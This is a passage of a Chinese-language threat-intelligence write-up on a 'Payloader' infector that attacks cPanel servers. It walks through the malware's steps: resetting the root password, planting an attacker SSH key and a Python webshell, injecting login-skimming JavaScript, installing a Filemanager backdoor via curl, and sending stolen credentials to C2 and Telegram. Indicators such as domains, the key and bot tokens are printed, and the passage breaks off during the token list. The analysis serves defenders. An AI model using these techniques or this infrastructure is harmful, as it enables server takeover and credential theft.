\&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">Payload感染器的主要任务是修改被入侵的系统的密码，向其植入SSH 公钥，PHP Webshell和恶意JS代码，部署filemanager远控，并将敏感的设备信息，凭证回传给黑客。</span></p></div><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">1. 修改密码 &amp; 植入SSH 公钥</span></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">对应的处理函数分别为 main_changeRootPassword 和 main_installSSHKey。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">修改ROOT密码：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="apache"><code><span leaf=""><span class="code-snippet__attribute">root</span>:<span class="code-snippet__number">123</span>Qwe123C</span></code></pre></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">植入SSH 公钥：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang=""><code><span leaf="">ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFIswJUfqrkbm2sIMfNHZn1sOYkxjNzEynqJKFU7qoez cpanel-updater</span></code></pre></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">2. 植入PHP Webshell</span></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">对应的处理函数为 main_installCpanelPy。Webshell的下载地址为 <a href="https://cp.dene.de[.]com/cpanel.py，本地路径为" target="_blank">https://cp.dene.de[.]com/cpanel.py，本地路径为</a> /usr/local/cpanel/cgi-sys/cpanel.py。这个Webshell的名字是 Cpanel-Python，支持文件上传&amp;浏览，以及远程命令执行等功能。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.46625" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035012" src="https://wechat2rss.xlab.app/img-proxy/?k=6338399b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqibUNS65qymmicwl2BzGQxZv4ibJ3Ywae3CzVlqFABJWxdk0xEH37BpunqgSgjgKadVyPeHxx3OxqVr1MibDxPcicra7jhHVGdoNKQA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">3. 注入Javascript代码</span></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">对应的处理函数为 main_injectLoginPage。从远程服务器 cp.dene.de[.]com 下载 login.js、login.tmpl，保存至 /usr/local/cpanel/base/unprotected/cpanel，用于创建自定义的登录页面。其中 login.tmpl 为模板文件，通过代码片段将 login.js 嵌入到 HTML 页面中。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2859154929577465" data-type="jpeg" data-w="710" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035010" src="https://wechat2rss.xlab.app/img-proxy/?k=5ccb16da&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq8ibgrQgJQu0qHJUO7kRfgcSYoiaKsEaibcQbM00PN38hJ73gT8EsS92T7PIxpPCXkbI5nnahVXicX6LNKdOxHD7mWaMiaSXjoBGSSc%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">而在 login.js 则通过下载代码片段实现窃取用户登录时的用户名、密码、User-Agent 以及当前 URL，并通过 AJAX 请求将这些敏感数据发送到攻击者控制的远程服务器。服务器地址 uggcf://jearq.pbz/ybt.cuc?g=3 使用 ROT13 编码，解码后为 https[:]//wrned.com/log[.]php?t=3。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5625" data-type="jpeg" data-w="720" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035017" src="https://wechat2rss.xlab.app/img-proxy/?k=0fdc5d14&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqiblEWGXTZebxQVJUEgKaejWVmF4EiaKh51UkmbVDibt81yLtfwO6ELXbsS3ZQTOVlIqibaQULPpibz1L2xN6BhMXbBGhKUHrlC4R6U%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">4. 部署Filemanager远控</span></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">对应的处理函数为 main_runWpsockInstaller。通过代码片段构建 curl 下载命令，其中 url 指向 Filemanager 后门的安装脚本下载地址 https[:]//wpsock[.]com/cpanel/install.sh，该域名的创建时间为2021年。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.135" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035014" src="https://wechat2rss.xlab.app/img-proxy/?k=5250ccf5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq9phltEISJDTicyJiabs8B8eFsWdpOdQ5V9ObHKHz1Msy9BKGC4O1sNUXPr60kYuqiaFC22cWfhmVrtMwVtAicAR5XFubfzg3BKr0Y%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">install.sh 中的代码表明 Filemanager 是一个跨平台的后门，支持 Darwin、Linux、Windows 3 个主流操作系统。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7490494296577946" data-type="jpeg" data-w="526" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035015" src="https://wechat2rss.xlab.app/img-proxy/?k=345df722&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq9qEsw2dP7AHibCppSwdRAdaEWmTfDHVKMgeOpuXUqbvjgenUjSThN8ZgBMHQBuHH9A3HUEuzoyoBYib2R27wDau8yqrbJtNnfpM%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">5. 敏感的信息回传至C2</span></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">对应的处理函数为 main_postData。收集被入侵系统的 bash 历史记录、ssh、设备信息、数据库密码、Valiases 配置等敏感信息，回传到黑客服务器，回传接口为 <a href="https://cp.dene.de[.]com/collect.php。" target="_blank">https://cp.dene.de[.]com/collect.php。</a></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.19055944055944055" data-type="jpeg" data-w="572" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035016" src="https://wechat2rss.xlab.app/img-proxy/?k=bff234d3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqicakRKv9sxF2KqHj67hDxw2YGuBUJYKtbF1IOjVibPFLCudpBNonSnYZvxYGYZOumicISYzlK4QdFXyMh4NBIbBHw8JYCEKpubN0%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">6. 敏感信息回传到Telegram</span></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">对应的处理函数为 main_sendTelegram 或 main_sendTelegramFile。除了 main_postData 这种方式，Payloader 感染器还支持一条冗余的 Telegram 回传通道，接收信息的群组 ID 为 -443071772。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.17125" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035018" src="https://wechat2rss.xlab.app/img-proxy/?k=033958ae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq9ib5zVIVUrhKU2onsMuRWDVp8phR8727F84MGP8gEdexCKoNsknWps48fNSzvY7MR0X2NCxQ4FichxCNkM68AiasB6JtagNzfIHs%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">众所周知，使用 Telegram Bot 进行数据传递，必须配置 Token，目前一共发现以下 2 个 Token，它们对应的其实都是一个名为 &#34;log_FatherBot&#34; 的 bot，只不过前者已被废除：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="makefile"><code><span leaf=""><span class="code-snippet__section">1190043163:AAEy1FDoB_r8KFiOIqsEpgDQ2k78Ai6BdWk</span></span></code><br/><code><span 